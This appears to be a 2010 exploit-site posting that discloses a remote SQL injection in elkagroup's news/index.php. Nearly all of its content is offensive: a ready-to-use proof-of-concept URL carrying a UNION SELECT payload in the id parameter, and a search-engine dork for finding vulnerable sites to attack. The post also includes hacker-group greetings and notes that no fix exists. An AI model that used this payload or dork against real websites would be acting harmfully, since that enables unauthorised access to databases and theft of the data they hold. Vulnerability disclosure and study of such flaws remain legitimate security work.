elkagroup (-New-Index.php ) Remote SQL Injection Vulnerability

2010-09-12 08:27:32
Posted by: Net.Edit0r

|| Title elkagroup (/New/Index.php ) Remote SQL Injection Vulnerability

|| Author: Net.Edit0r

|| email: Net.Edit0r[at]Att[DoT]Net


||| script : http://www.elkapax.com & http://www.elkagroup.com

||| DorK : "Powered by : elkagroup.com"

||| Note : IRANIAN HackerZ

POC
________

http://[server]/[path]/news/index.php?id=-168+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--

# >>> Special Thanks To Mr Faz ....... Email: [email protected]

# >>> Greetz : Netqurd , Riden , Ehsan , † CoNstaNtine † , ~~XTerror~~ , __l2o5v4__ , _R3v4l_ Darkcoder

Fixes

No fixes

In order to submit a new fix you need to be registered.